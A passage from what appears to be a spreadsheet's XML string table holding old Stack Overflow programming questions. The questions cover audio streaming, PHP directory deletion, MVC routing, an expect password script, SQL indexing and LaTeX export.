org.springframework.orm.ibatis.SqlMapClientFactoryBean sqlMapClient {
    @scope = singleton;
    @init-method = afterPropertiesSet;
    @factory-method = getObject;
    configLocation = "classpath:sqlmap-config.xml";
    dataSource = $dataSource;
}
/* this string will have Java unescape encoding applied */
STRING str = "\tA test\u0020string with \\ escaped character encodings\r\n";
/* this string will remain literal - with escape characters remaining in place */
STRING regexp = @"(\$\{([a-zA-Z][a-zA-Z0-9._]*)\})";
/* multi-line text block - equates to a java.lang.String instance */
TEXT my_multi_line_text = ///
Here is a line of text.
This is yet another. Here is a blank line:
Now picks up again.
///;
/* forward use of 'props' bean */
java.util.HashMap map {
    this( $props );
}
/* equates to a java.util.Propertis instance */
PROPERTIES props {
    "James Ward" = "Adobe Flex evangelist";
    "Stu Stern" = "Gorilla Logic - Flex Monkey test automation";
    Dilbert = "character in popular comic strip of same title";
    "App Title Display" = "Application: ${app.name}";
    "${app.desc}" = "JFig processes text-format Java configuration data";
}
/* equates to a java.util.ArrayList instance */
LIST list {
    this( ["dusty", "moldy", "${app.version}", $str] );
    [234, 9798.76, -98, .05, "numbers", $props, ["red", "green", "blue"]];
}
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>Streaming audio from server to iPhone</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm looking to stream some audio files I have on my server to an iPhone-client application I'm writing. Some of the audio files can be rather large in size, even after compression. My question is, is there a Cocoa framework that helps me with buffering the audio so it becomes available to the user while the rest is being brought down the pipes? If not, can anyone point me in the right direction to learn more about the technologies required to make such a thing happen using Objective-C/Cocoa?&lt;/p&gt;
&lt;p&gt;A definitive resource on buffering and compression of audio from a server&amp;lt;-&gt;client infrastructure would be ideal.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I do lots of processing without gobbling cpu?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I know the question title isn't the best. Let me explain.&lt;/p&gt;
&lt;p&gt;I do a TON of text processing which converts natural language to xml. These text files get uploaded fairly fast and thrown into a queue. From there they are pulled one-by-one into a background worker that calls our parser (using boost spirit) to transform the text into xml and load relevant portions into our db.&lt;/p&gt;
&lt;p&gt;The parser can do about 100 of these at a time. I have rate-limiters on the background worker to only poll our queue every so often right now so it doesn't perform as fast. I can't throw up more than one background worker right now because my http requests start to drop -- the background worker and the webserver exist on the same machine and I &lt;em&gt;believe&lt;/em&gt; it is because of cpu usage hitting 80-95%, although we could use more ram on it as well.&lt;/p&gt;
&lt;p&gt;I need to scale this better. How would you go about doing it?&lt;/p&gt;
&lt;p&gt;In answers to several questions:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;p&gt;we use amazon web services so buying cheap extra hardware is a bit different from spawning a new amazon instance -- maybe somebody has done some code that autospawns instances on amount of load?&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;we do have a http server that just stuffs our files into a queue so the only reason it would be affected is because the cpu is busy dealing with tons of parsing related stuff&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;I already rate-limit our background workers, although we don't utilize that in the parser itself&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;I haven't tried nice yet but I've used it in the past -- I need to write down some benchmarks on that&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;the parser is completely seperate from the web server -- we have nginx/merb as our web/application server and a rake task calling c++ as our background worker -- yet they do exist on the same machine &lt;/p&gt;&lt;/li&gt;
&lt;/ul&gt;
</t>
  </si>
  <si>
    <t>A piece of PHP code I'm not so sure about</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have here a piece of PHP code that deletes a directory and all files in it if present.
However, I'm not too sure about it, it looks to me like it'll delete all sub-maps too and then files in those and so on...&lt;/p&gt;
&lt;p&gt;I basically want to give and optional true/false parameter to select wheter or not to delete sub directories. Or would it be better practice to make 2 functions? The first to completely empty the folder and the seconds the delete both the folder and everything in it.&lt;/p&gt;
&lt;p&gt;Here's the code:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;function delete_directory($dirname) {
   if (is_dir($dirname)) {
     $dir_handle = opendir($dirname);
     if (!$dir_handle) return false;
     while($file = readdir($dir_handle)) {
       if ($file != "." &amp;amp;&amp;amp; $file != "..") {
         if (!is_dir($dirname."/".$file)){
         @unlink($dirname."/".$file);
       }else {
         delete_directory($dirname.'/'.$file);
         }
       }
     }
     closedir($dir_handle);
   }
   @rmdir($dirname) or die("Could not remove directory.");
   return true;
 }
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;And what I'm basically wondering is: what can go wrong here?
Is there a situation where this piece of code can seriously screw up?
I've been debugging it with Netbeans for a few hours now, and tried a lot of different scenarios. Now I'm kinda stuck and wondering if the guys at StackoverFlow can find a flaw in the code?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Windows Gadgets &amp; Jquery</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am creating a Vista Gadget and I haven't been able to get JQuery to work. I have tried a few very simple calls like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;$(function() {
      $('a').click(function() {
          $('#box').html("test");
      });
});
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I know you can use JavaScript so it doesn't make much sense to me why you wouldn't be able to use a library.&lt;/p&gt;
&lt;p&gt;Does anyone know if any examples?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to do a custom asp.net routing (hardcoding the controller)</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm trying to create a route for the following urls:
www.mysite.com/user/username
www.mysite.com/user/username/pictures&lt;/p&gt;
&lt;p&gt;I tried doing that with the following code:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;routes.MapRoute(
            "UserProfile",
            "user/{sn}/{action}",
            new { controller = "User", action = "Index", sn = "" }
        );
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;So if an action is not specified, you go to the index action.&lt;/p&gt;
&lt;p&gt;However, it's not working and I'm not sure what I'm doing wrong. &lt;/p&gt;
&lt;p&gt;Thanks for any help. &lt;/p&gt;
</t>
  </si>
  <si>
    <t>User Breakpoint from nowhere</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have some code in MS VC++ 6.0 that I am debugging.  For some reason, at this certain point where I am trying to delete some dynamically allocated memory, it breaks and I get a pop up message box saying "User Breakpoint called from code at blah blah".. then the Disassembly window pops up and I see&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;*memory address* int      3
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The odd thing is, there is NOWHERE in the code that I am calling an assembly instruction like this (I think asm int 3 is a hardware break command for x86?)..  &lt;/p&gt;
&lt;p&gt;what could be causing this?&lt;/p&gt;
&lt;p&gt;EDIT: ANSWER: My code was "walking off the end" of an array, but only in the locations marked by Visual Studio debug with 0xFDFDFDFD, which is called a NoMan'sLand fence.. I think its also called an Off-by-one error.. This array was unrelated to the point where i was freeing the memory when the error was occuring. Which made it harder to spot.. :(&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Variable watch in PHP</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Does PHP have the ability to watch a variable (or object property) and run a function when its value changes, similar to &lt;a href="https://developer.mozilla.org/En/Core_JavaScript_1.5_Reference/Global_Objects/Object/Watch" rel="nofollow"&gt;Gecko's Javascript &lt;code&gt;watch&lt;/code&gt; function&lt;/a&gt;?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Missing AVFoundation.framework</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;&lt;code&gt;AVFoundation.framework&lt;/code&gt; is not where the documentation says it should be. I have iPhone SDK 2.2 installed (never had previous sdk versions installed) and I can't find that folder under &lt;code&gt;/System/Library/Frameworks&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;I did find it under&lt;/p&gt;
&lt;pre&gt;&lt;code&gt; /Developer/Platforms/iPhoneOS.platform/Developer/SDKs/iPhoneOS2.2.sdk/System/Library/Frameworks/
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;folder but if I add it from that location, then the compiler can't find the header files. I tried copying the entire &lt;code&gt;AVFoundation.framework&lt;/code&gt; folder to &lt;code&gt;/System/Library/Framework&lt;/code&gt;, but it still can't find the header files.&lt;/p&gt;
&lt;p&gt;How can I use &lt;code&gt;AVFoundation&lt;/code&gt; classes?&lt;/p&gt;
&lt;p&gt;Thanks,
Alex&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Asp.Net MVC - Best approach for "dynamic" routing</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am trying to come up with an approach to create "dynamic" routing. What I mean, exactly, is that I want to be able to assign the controller and action of a route for each hit rather than having it mapped directly.&lt;/p&gt;
&lt;p&gt;For example, a route may look like this "path/{object}" and when that path is hit, a lookup is performed providing the appropriate controller / action to call.  &lt;/p&gt;
&lt;p&gt;I've tried discovering the mechanisms for creating a custom route handler, but the documentation / discoverability is a bit shady at the moment (I know, its beta - I wouldn't expect any more). Although, I'm not sure if thats even the best approach and perhaps a controller factory or even a default controller/action that performs all of the mappings may be the best route (no pun intended) to go.&lt;/p&gt;
&lt;p&gt;Any advice would be appreciated. &lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can I use PHP to obfuscate email addresses so they are not easily harvested by spammers?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm programming in PHP and would like to create web pages which have email addresses that are easily read by humans but not easily harvested by spammers.  The email addresses are coming from user input, and I think I can identify an address by using a regular expression, but I'm not clear exactly how I should replace the email addresses or with what, in order to keep most automated spam bots from harvesting them.&lt;/p&gt;
&lt;p&gt;Here's one idea: (pseudo code)&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;(email)@(domain.com) $1&amp;lt;span class="remove"&amp;gt;DELETE&amp;lt;/span&amp;gt;$2
.remove {
   display: none;
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Hopefully the bot will trip up on the span tag.&lt;/p&gt;
&lt;p&gt;Finally, I'm looking for a solution that will not disturb email addresses that are inside of &lt;code&gt;mailto:&lt;/code&gt; tags.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Duplicate of&lt;/strong&gt; &lt;a href="http://stackoverflow.com/questions/311555/how-can-i-prevent-prevent-bots-from-collecting-e-mail-addresses#311629" rel="nofollow" title="How can I prevent prevent bots from collecting e-mail addresses?"&gt;How can I prevent prevent bots from collecting e-mail addresses?&lt;/a&gt; which is duplicate of &lt;a href="http://stackoverflow.com/questions/308772/what-are-some-ways-to-protect-emails-on-websites-from-spambots#309147" rel="nofollow" title="What are some ways to protect emails on websites from spambots?"&gt;What are some ways to protect emails on websites from spambots?&lt;/a&gt; and maybe some others...&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I setup a callback mechanism for RichEdit in win32</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;&lt;strong&gt;In win32, how do I setup a callback mechanism for RichEdit I have not created myself?&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;PART 1&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;a href="http://stackoverflow.com/questions/352236/reading-from-a-text-field-in-another-applications-window"&gt;I'm reading from a textedit field in another application's GUI&lt;/a&gt;. This works just fine now, except after the first read I'd like to fetch only new or modified lines. In GTK+ or Qt I'd just install a callback on some signal the field edits when its changed, but how does it work on Win32? &lt;/p&gt;
&lt;p&gt;My MSDN searches result with nothing useful, probably because I don't know the exact term to search for. The class of the textedit is &lt;a href="http://msdn.microsoft.com/en-us/netframework/bb787877(VS.85).aspx" rel="nofollow"&gt;RichText20W&lt;/a&gt;, and it has some &lt;a href="http://msdn.microsoft.com/en-us/netframework/bb774366(VS.85).aspx" rel="nofollow"&gt;messages&lt;/a&gt; that are probably used somehow, though that article just discusses using them for the parent of the class.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;PART 2&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Also, &lt;em&gt;if&lt;/em&gt; there is no such "text changed, here is the newly inserted text" callback which returns the new content immediately, I need some way to easily detect what is new. From top-of-my-head:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Have a marker at the end of the text block we've read, and only read between that and the end.&lt;/li&gt;
&lt;li&gt;Store what we've read previously, and after a second read, remove the duplicate part from the latter to have the newly inserted stuff.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;Option 2 might not be viable, since the textedit can contain any amount of text. The marker part sounds doable, but yet again, my feeble Win32 skills and horrible Win32 function names prevent me from finding the right way to do it.&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Note that all these must be doable for a textedit I &lt;strong&gt;do not&lt;/strong&gt; own and have not created, they belong to a third party process.&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Code samples in C++ highly appreciated.&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Disclaimer&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;Obviously, if there is some better way of doing it, let me know. I only assumed callback would be the way to go based on my previous experience with GTK+/Qt. Feel free to show me the path :)&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do you deal with failing Unit Tests?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a number of projects in a solution file that have unit tests written for them and I am wanting to set them up to be run by our continuous integration server. However, because many of the tests have been written poorly and have not been run regularly there are many that are failing.&lt;/p&gt;
&lt;p&gt;I don't have the time at the moment to fix all of the tests but I do believe there is value in having the existing tests run. What is the best way do deal with the failing Unit Tests?&lt;/p&gt;
&lt;p&gt;What I am currently doing is marking each failing test as Explicit and leaving a TODO comment. &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;[Test, Explicit] //TODO: Rewrite this test because it fails
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Is there a better way of doing this? Or should I fix all the tests before including them in the tests that are run by the CIS?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Timed Subscription Schedule in SSRS sends out duplicate emails</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have created a one-time subscription in SSRS report manager 2008. However I keep getting duplicate emails sent out by the subscription. The interval between each email is about 30 minutes. &lt;/p&gt;
&lt;p&gt;I have checked SQL agent job and it looks the SQL agent job is created correctly. It just runs once and after that the next run time is cleared. &lt;/p&gt;
&lt;p&gt;I also checked SMTP service on local machine by testing code. SMTP works fine for test email without duplicate. So I guess probably it is something wrong in SSRS. Any advice on where I can look into? &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Silverlight WebPart in Sharepoint</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am new to Silverlight 2.0 and I am actually trying to deploy the Silverlight as webpart in Sharepoint 2007.&lt;/p&gt;
&lt;p&gt;I have done the following Installations:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;VS 2008 with SP1&lt;/li&gt;
&lt;li&gt;Silverlight 2.0 SDK and exe&lt;/li&gt;
&lt;li&gt;Silverlight Tools for VS 2008&lt;/li&gt;
&lt;li&gt;MOSS 2007&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;I have created the sample Silverlight application and got the xap file from the bin directory of the solution.&lt;/p&gt;
&lt;p&gt;Then I wrote a standard Sharepoint webpart with a reference to both &lt;code&gt;Web.Extensions&lt;/code&gt; and &lt;code&gt;Microsoft.Silverlight&lt;/code&gt; dll's:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;using System;
using System.Runtime.InteropServices;
using System.Web.UI;
using System.Web.UI.WebControls;
using System.Web.UI.WebControls.WebParts;
using System.Xml.Serialization;
using System.Web.UI.SilverlightControls;
using Microsoft.SharePoint;
using Microsoft.SharePoint.WebControls;
using Microsoft.SharePoint.WebPartPages;
namespace SLWeb_Part1
{
    [Guid("c890f832-05d2-4724-ae25-5f34c827c6c2")]
    public class SLWeb_Part1 : System.Web.UI.WebControls.WebParts.WebPart
    {
        public SLWeb_Part1()
        {
        }
        [WebBrowsable(true),
        Personalizable(PersonalizationScope.User),
        WebDescription("Location of the Silverlight XAP package"),
        WebDisplayName("XAP Location")]
        public string XAPSource { get; set; }
        [WebBrowsable(true),
        Personalizable(PersonalizationScope.User),
        WebDescription("Silverlight Controld ID "),
        WebDisplayName("Control ID")]
        public string ControlID { get; set; }
        protected override void OnLoad(EventArgs e)
        {
            base.OnLoad(e);
            ScriptManager scriptManager = ScriptManager.GetCurrent(this.Page);
            if (scriptManager == null)
            {
                scriptManager = new ScriptManager();
                this.Controls.Add(scriptManager);
            }
        }
        protected override void CreateChildControls()
        {
            base.CreateChildControls();
            Silverlight sl = new Silverlight();
            sl.Source = XAPSource;
            sl.ID = ControlID;
            sl.Width = new Unit(400);
            sl.Height = new Unit(400);
            this.Controls.Add(sl);
        }
    }
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I also deployed the same to the Sharepoint site, then I made an entry to the Sharepoint site's &lt;code&gt;web.config&lt;/code&gt; file to include the Silverlight and Web.Extension assembly's like:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;add assembly="System.Web.Silverlight, Version=2.0.5.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35" /&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Then I included &lt;code&gt;application/x-silverlight-app&lt;/code&gt; as MIME type for the web application in IIS.&lt;/p&gt;
&lt;p&gt;After doing all this... I was able to browse the site as usual, but I couldnt see the Silverlight component running.... and it is not throwing any error also...&lt;/p&gt;
&lt;p&gt;Can anybody help me to solve this problem at the earliest?
Do I miss any steps in the configuration?&lt;/p&gt;
&lt;p&gt;Thanks in advance.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>JavaScript - Identify whether a property is defined and set to 'undefined', or undefined</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Say I have the following code:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;function One() {}
One.prototype.x = undefined;
function Two() {}
var o = new One();
var t = new Two();
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;code&gt;o.x&lt;/code&gt; and &lt;code&gt;t.x&lt;/code&gt; will both evaluate to &lt;code&gt;undefined&lt;/code&gt;. &lt;code&gt;o.hasOwnProperty('x')&lt;/code&gt; and &lt;code&gt;t.hasOwnProperty('x')&lt;/code&gt; will both return false; the same goes for &lt;code&gt;propertyIsEnumerable&lt;/code&gt;. Two questions:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Is there any way to tell that o.x is defined and set to &lt;code&gt;undefined&lt;/code&gt;?&lt;/li&gt;
&lt;li&gt;Is there ever any reason to? (should the two be semantically equivalent?)&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;A small caveat: doing (for propName in o) loop will yield 'x' as one of the strings, while doing it in t will not - so there IS a difference in how they're represented internally (at least in Chrome).&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Problem with an expect script</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm trying to create a script to update a password in a
non-interactive way. It's working on my laptop but fails on my server.
Both are running the same configuration, using Etch.&lt;/p&gt;
&lt;p&gt;This is the script:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;#!/usr/bin/expect -f
# Change user passwd
set timeout 30
strace 4
set password [lindex $argv 1]
set old_password [lindex $argv 2]
spawn passwd [lindex $argv 0]
sleep 1
expect "(current) UNIX password: $"
send "$old_password\r"
expect "Enter new UNIX password: $"
send "$password\r"
expect "Retype new UNIX password: $"
send "$password\r"
expect eof
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;On the server the output looks like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;myuser@server:~$  /home/myuser/adm/chpasswd myuser NewPasswd OldPasswd
 2    lindex $argv 0
 1  set username [lindex $argv 0]
 2    lindex $argv 1
 1  set password [lindex $argv 1]
 2    lindex $argv 2
 1  set old_password [lindex $argv 2]
 1  spawn passwd $username
spawn passwd myuser
 1  sleep 1
 1  expect "(current) UNIX password: $"
Changing password for myuser
(current) UNIX password:  1  send "$old_password\r"
 1  expect "Enter new UNIX password: $"
OldPasswd
Enter new UNIX password:  1  send "$password\r"
 1  expect "Retype new UNIX password: $"
NewPasswd
 1  send "$password\r"
 1  expect eof
Retype new UNIX password:  1  exit 0
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;So is not working, as the couple expect-send seems unsync.&lt;/p&gt;
&lt;p&gt;But strangely enough, on my laptop it works:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;test@mars:/home/test/adm$ ./chpasswd test NewPasswd OldPasswd
 2    lindex $argv 1
 1  set password [lindex $argv 1]
 2    lindex $argv 2
 1  set old_password [lindex $argv 2]
 2    lindex $argv 0
 1  spawn passwd [lindex $argv 0]
spawn passwd test
 1  sleep 1
 1  expect "(current) UNIX password: $"
Changing password for test
(current) UNIX password:  1  send "$old_password\r"
 1  expect "Enter new UNIX password: $"
OldPasswd
Enter new UNIX password:  1  send "$password\r"
 1  expect "Retype new UNIX password: $"
NewPasswd
Retype new UNIX password:  1  send "$password\r"
 1  expect eof
NewPasswd
passwd: password updated successfully
 1  exit 0
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Any ideas why it's going wrong on the server ?
Thanks&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What's wrong with nullable columns in composite primary keys?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;ORACLE does not permit NULL values in any of the columns that comprise a primary key. It appears that the same is true of most other "enterprise-level" systems.&lt;/p&gt;
&lt;p&gt;At the same time, most systems also allow &lt;em&gt;unique&lt;/em&gt; contraints on nullable columns.&lt;/p&gt;
&lt;p&gt;Why is it that unique constraints can have NULLs but primary keys can not? Is there a fundamental logical reason for this, or is this more of a technical limitation?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Drupal Aggregator input format</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Drupal Aggregator core module is a useful one but suffers many problems. There are many talking about improving it in Drupal 7.&lt;/p&gt;
&lt;p&gt;Right now I'm using Aggregator module which comes with Drupal 6. I'm building an aggregation site, and there is one BIG problem. Sometimes feeds contain HTML tags attributes (e.g. style, dir, title), but Aggregator's input format filter ignores SOME attributes (e.g. style and dir) and allows others (class and href). Without some attributes feeds look very missy. Aggregator contains it's own input format, it doesn't use other inputs formats (and this makes the problem harder!).&lt;/p&gt;
&lt;p&gt;The question is how can I allow some HTML tags' attributes to appear in feeds.&lt;/p&gt;
&lt;p&gt;P.S. last thing to do is modifying Aggregator's core files&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Possible to search multiple tables with a single query? [MSAccess/SQL Server]</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;So my goal here is to have a single search field in an application that will be able to search multiple tables and return results.&lt;/p&gt;
&lt;p&gt;For example, two of these tables are "performers" and "venues" and there are the following performers: "John Andrews","Andrew Smith","John Doe" and the following venues: "St. Andrew's Church","City Hall".  Is there a way to somehow return the first two performers and the first venue for a search of "Andrew"?&lt;/p&gt;
&lt;p&gt;My first thought was to somehow get all the tables aggregated into a single table with three columns; "SearchableText","ResultType","ResultID".  The first column would contain whatever I want searched (e.g. Performer name), the second would say what is being shown (e.g. Performer) and the third would say the item's ID (note: all my tables have auto-incrementing primary keys for ease).  The question for this idea is it possible to somehow do this dynamically or do I have to add code to have a table that automatically fills whenever a new row is updated/added/deleted from the performers and venues table (perhaps via trigger?).&lt;/p&gt;
&lt;p&gt;My application is written in MSAccess (I know, I know, but I have no choice) on top of a SQL Server backend.  I'd prefer this happen through MSAccess so I don't have to have a "searchme" table sitting on my SQL Server but any good result is acceptable :)&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can I hide "defined but not used" warnings in GCC?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a bunch of compile time asserts, such as:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;CASSERT(isTrue) or CASSERT2(isTrue, prefix_)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;When compiling with GCC I get many warnings like &lt;code&gt;'prefix_LineNumber' defined but not used&lt;/code&gt;. Is there a way I can hide warnings for compile time asserts? I had no luck searching the GCC documentation. I thought I might have the var automatically used globally inside the same macro but I couldn't think of any way to do it.&lt;/p&gt;
&lt;p&gt;Does anyone know of a way to hide that warning in GCC?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What fields should be indexed on a given table?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've a table with a lot of registers (more than 2 million). It's a transaction table but I need a report with a lot of joins. Whats the best practice to index that table because it's consuming too much time.&lt;/p&gt;
&lt;p&gt;I'm paging the table using the storedprocedure paging method but I need an index because when I want to export the report I need to get the entire query without pagination and to get the total records I need a select all.&lt;/p&gt;
&lt;p&gt;Any help?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>resize images with canvas - css overflow issue</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm working on a JavaScript image resizing feature which rely on the IE only DXImageTransform addon.&lt;/p&gt;
&lt;p&gt;Wanting to address modern browsers as well, I gave a shot to canvas, with pretty good results.&lt;/p&gt;
&lt;p&gt;However, I face an issue in my resize function, which is the following:&lt;/p&gt;
&lt;pre&gt;
function Resize(oObj, flMultiplier)
{       
  var canvas = document.getElementById('canvas');
  var canvasContext = canvas.getContext('2d');
  oObj.style.visibility = 'hidden';
  canvasContext.clearRect(0,0,canvas.width,canvas.height); // clear canvas
  canvasContext.fillStyle = 'rgba(0,0,0,0.4)';
  canvasContext.scale(flMultiplier,flMultiplier);
  canvasContext.drawImage(oObj, 0, 0);
}
&lt;/pre&gt;
&lt;p&gt;If my image becomes bigger than the canvas item, then one will see only a portion of the image, which is bad.&lt;/p&gt;
&lt;p&gt;I tried to tweak the canvas size at runtime, but if affects the display of the resized image. &lt;/p&gt;
&lt;p&gt;So I ended up declaring a &lt;em&gt;big&lt;/em&gt; canvas element, which is pretty OK, except that the css overflow of my web page is adjusted on my biggest element, and not on my resized image, which is a pain.&lt;/p&gt;
&lt;p&gt;So I guess there are two ways to solve my problem:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Try to exclude the big canvas element from the overflow scheme&lt;/li&gt;
&lt;li&gt;Try to update the canvas element size when resizing (I may have missed something there)&lt;/li&gt;
&lt;/ol&gt;
</t>
  </si>
  <si>
    <t>Initialize generic object with unknown type</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How can I initialize a list containing generic objects whose types can be different?&lt;/p&gt;
&lt;p&gt;For example, I have the following:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;this.Wheres = new List&amp;lt;Where&amp;lt;&amp;gt;&amp;gt;();
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;As you know, &amp;lt;&gt; is not valid syntax. However, sometimes the type passed to Where will be a string and sometimes it will be DateTime, etc. I tried using object as the initialized type, but that doesn't work either.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What are the IDE advantages of recorded macros?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Just as the title says, I see a lot of editors touting macro recording as a feature but cannot find a way to take advantage of these functions myself.  So what can you use it for?  The type where you can record mouse movement and/or keystrokes?  Is it really that helpful to people out there?  Specifically, I deal with Eclipse which has a number of built in "fill in" functions, so I really don't see what the advantages could be.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>best compression algorithm with the following features</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What is the best compression algorithm with the following features:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;should take less time to decompress (can take reasonably more time compress)&lt;/li&gt;
&lt;li&gt;should be able to compress sorted data (approx list of 3,000,000 strings/integers ...)&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Please suggest along with metrics: compression ratio, algorithmic complexity for compression and decompression (if possible)?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Getting Started with IronRuby on Rails</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Can somebody point me to a tutorial and/or Getting Started document to get IronRuby running Rails?  I'm particularly interested in a detailed, step-by-step reference, &lt;em&gt;not&lt;/em&gt; general guidelines.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>console output formatting</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Are there any conventions for formatting console output from a command line app for readability and consistency?  For instance, do you indent sub-information, when do you print a blank line, if ever, how should you accent important statements.&lt;/p&gt;
&lt;p&gt;I've found  output can quickly degenerate into a chaotic blur.  I'm interested in hearing about what other people do.&lt;/p&gt;
&lt;p&gt;&lt;B&gt;Update:&lt;/B&gt; Really this is for embedded software which spits debug status out a terminal, but it's pretty much like a console app, and I figured everyone would be more familiar with that.  Thanks so far.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is it possible for a Asp.Net developer on 64-bit windows to work with a team that has 32-bit?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Are there any compatibility issues that would prevent this from working? Do I need to have a 32-bit VM to use when working on projects for this team?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Which is the best import / export LaTeX tool?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Working in academia publishing CS/math, you sooner or later find yourself trying to publish in a journal that will only accept .doc/.rtf. This means tedious, boring hours of translating line after line, especially equations, from LaTeX to an inferior format. Over the years I have tried a number of export tools for LaTeX, but none, at least of the free ones, that I have been very satisfied with. I'd like this page to collect and monitor the best import/export tools for LaTeX, to .doc/.rtf, or to other useful (e.g. HTML, MATHML) formats.&lt;/p&gt;
&lt;p&gt;Thus, what is your one favorite import or export LaTeX tool?&lt;/p&gt;
</t>
  </si>
